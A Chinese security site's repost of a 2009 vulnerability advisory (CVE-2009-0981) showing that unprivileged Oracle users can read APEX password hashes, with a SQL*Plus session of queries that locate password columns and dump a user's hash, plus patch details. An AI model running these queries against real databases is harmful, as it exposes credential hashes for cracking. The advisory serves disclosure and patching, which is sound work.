首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes
来源:ak at red-database-security.com 作者:Kornbrus 发布时间:2009-04-17  

Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]

Name    Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]
Systems Affected  APEX 3.0 (optional component of 11.1.0.7 installation)
Severity   High Risk
Category   Password Disclosure
Vendor URL   http://www.oracle.com/
Author    Alexander Kornbrust (ak at red-database-security.com)
CVE    CVE-2009-0981
Advisory   14 April 2009 (V 1.00)


Details
Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.
Tested on 11.1.0.7.

C:\> sqlplus dummy/dummy
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
------------------------------
CONNECT


SQL> select owner,table_name from all_tables where owner='FLOWS_030000';

OWNER TABLE_NAME
------------------------------ ------------------------------
FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE

 

Get a list of all columns containing the string "%PASSWORD%'

SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';

OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
--------------------------------------------------------------------------------
FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE

9 rows selected.


SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS

USER_NAME WEB_PASSWORD2
--------------------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.


Patch Information
Apply the patches for Oracle CPU April 2009.


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·webSPELL 4.2.0c Bypass BBCode
·eLitius 1.0 (manage-admin.php)
·Elecard AVC HD Player .XPL Sta
·MagicISO CCD/Cue Local Heap Ov
·Apollo 37zz (M3u File) Local H
·Apache Geronimo Application Se
·Geeklog <= 1.5.2 savepreferenc
·The Miniweb webserver suffers
·Microsoft Media Player (quartz
·Zervit Webserver 0.02 Remote B
·Microsoft GDI Plugin .png Infi
·MS Windows Media Player (.mid
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved